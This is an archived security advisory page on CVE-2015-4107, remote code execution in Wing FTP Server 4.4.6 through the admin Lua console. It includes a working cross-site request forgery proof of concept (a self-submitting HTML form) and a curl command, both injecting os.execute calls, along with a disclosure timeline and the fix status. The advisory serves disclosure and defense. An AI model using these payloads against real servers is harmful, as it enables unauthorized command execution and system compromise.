exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Wing FTP 4.4.6 Code Execution / Cross Site Request Forgery

Wing FTP 4.4.6 Code Execution / Cross Site Request Forgery
Posted Jun 5, 2015
Authored by Alex Haynes

Wing FTP server version 4.4.6 suffers from remote code execution and cross site request forgery vulnerabilities.

tags | exploit, remote, vulnerability, code execution, csrf
advisories | CVE-2015-4107
SHA-256 | d5f811da15835c82a1d1dc941e5a6d7b9fabd30e25710fec8dd6e43f8b68b87f

Wing FTP 4.4.6 Code Execution / Cross Site Request Forgery

Change Mirror Download
Exploit Title: Wing FTP Server Remote Code Execution vulnerability
Product: Wing FTP Server
Vulnerable Versions: 4.4.6 and all previous versions
Tested Version: 4.4.6
Advisory Publication: 05/06/2015
Latest Update: 05/06/2015
Vulnerability Type: Improper Control of Generation of Code [CWE-94]
CVE Reference: CVE-2015-4107
Credit: Alex Haynes

Advisory Details:


(1) Vendor & Product Description
--------------------------------
Vendor:Wing FTP software


Product & Version:
Wing FTP Server v 4.4.6

Vendor URL & Download:
http://www.wftpserver.com/

Product Description:
"Wing FTP Server is an easy-to-use, secure and feature-rich enterprise FTP Server that can be used in Windows, Linux, Mac OSX and Solaris. It supports a number of file transfer protocols, including FTP, HTTP, FTPS, HTTPS and SFTP server, giving your end-users flexibility in how they connect to the server. And it provides admins with a web based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server."


(2) Vulnerability Details:
--------------------------
The admin interface of Wing FTP Server is vulnerable to a Remote Code Execution (RCE) vulnerability.

Proof of concept for RCE [CVE-2015-4107]:
-----------------------------------------

The RCE can be exploited in two scenarios, either by a CSRF attack (the admin interface is vulnerable to CSRF attacks) or by being authenticated to the admin interface. The attack leverages the LUA CLI to inject commands at the same privilege as the web server.

The RCE via CSRF POC

<html>
<body>
<form action="http://<server address>:5466/admin_lua_script.html" method="POST" enctype="text/plain">
<input type="hidden" name="command" value="os.execute('<any OS command here>')" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

RCE via authenticated administrator

1) Either utilising the LUA Console interface directly and using the os.execute('<OS command here>') method.
2) POST directly using CURL with an authenticated cookie:
curl -i -s -k -X 'POST' -b 'admin_lang=english; UIDADMIN=b8b208e2239f462c11641eaa10cde7b0' --data-binary $'command=os.execute(\'cmd.exe\')'
'http://<server address>:5466/admin_lua_script.html'

Parameter names: "command"
Parameter Type: POST
Attack Pattern:
Any OS command can be inserted into the os.execute('') method.


(3) Advisory Timeline:
----------------------
27/05/2015 - First Contact
27/05/2015 - Vendor responds with requests for details of vulnerabilities.
28/05/2015 - Vulnerability details sent with POC.
28/05/2015 - Vendor requests clarification on impact and various attack scenarios.
28/05/2015 - Vulnerability scenarios defined.
29/05/2015 - Vulnerability confirmed and new version 4.4.7 released. Requests a week delay before public disclosure.
05/06/2015 - Public disclosure

(4)Solution:
------------
CSRF attack vector fixed in version 4.4.7. No fix for authenticated RCE at this time.


(5) Credits:
------------
Discovered by Alex Haynes

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4107
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4107
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close